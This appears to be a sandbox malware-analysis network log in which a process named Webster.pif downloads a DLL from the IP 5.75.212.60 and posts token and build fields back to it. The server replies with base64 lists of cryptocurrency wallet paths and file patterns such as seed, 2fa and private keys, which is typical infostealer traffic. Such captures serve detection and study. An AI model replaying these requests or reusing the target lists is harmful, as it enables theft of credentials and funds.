4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20
                                                                                Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
                                                                                2024-07-26 15:54:50 UTC16384INData Raw: c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12
                                                                                Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                2024-07-26 15:54:50 UTC15603INData Raw: 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f
                                                                                Data Ascii: @L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.6641835.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:51 UTC238OUTGET /nss3.dll HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:52 UTC261INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:52 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 2046288
                                                                                Connection: close
                                                                                Last-Modified: Friday, 26-Jul-2024 15:54:52 GMT
                                                                                Cache-Control: no-store, no-cache
                                                                                Accept-Ranges: bytes
                                                                                2024-07-26 15:54:52 UTC16123INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                2024-07-26 15:54:52 UTC16384INData Raw: f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51
                                                                                Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQ
                                                                                2024-07-26 15:54:52 UTC16384INData Raw: 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b
                                                                                Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                2024-07-26 15:54:52 UTC16384INData Raw: 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d
                                                                                Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                2024-07-26 15:54:52 UTC16384INData Raw: 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10
                                                                                Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                2024-07-26 15:54:52 UTC16384INData Raw: d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00
                                                                                Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                2024-07-26 15:54:52 UTC16384INData Raw: 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24
                                                                                Data Ascii: 8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$
                                                                                2024-07-26 15:54:52 UTC16384INData Raw: 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff
                                                                                Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                2024-07-26 15:54:52 UTC16384INData Raw: e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74
                                                                                Data Ascii: `P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rtt
                                                                                2024-07-26 15:54:52 UTC16384INData Raw: 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00
                                                                                Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.6641845.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:55 UTC323OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 1025
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:55 UTC1025OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------ECGDBAEHIJKKFHIEGCBGCont
                                                                                2024-07-26 15:54:56 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 2ok0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.6641855.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:56 UTC322OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 331
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------DAAAFBKECAKEHIEBAFIECont
                                                                                2024-07-26 15:54:57 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:57 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:57 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.6641865.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:58 UTC322OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAE
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 331
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                2024-07-26 15:54:58 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 0d 0a 43 6f 6e 74
                                                                                Data Ascii: ------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------AKEGDAKEHJDHIDHJJDAEContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------AKEGDAKEHJDHIDHJJDAECont
                                                                                2024-07-26 15:54:58 UTC158INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:58 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                2024-07-26 15:54:58 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.6641875.75.212.604435740C:\Users\user\AppData\Local\Temp\229536\Webster.pif
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-26 15:54:59 UTC322OUTPOST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKK
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 465
                                                                                Connection: Keep-Alive
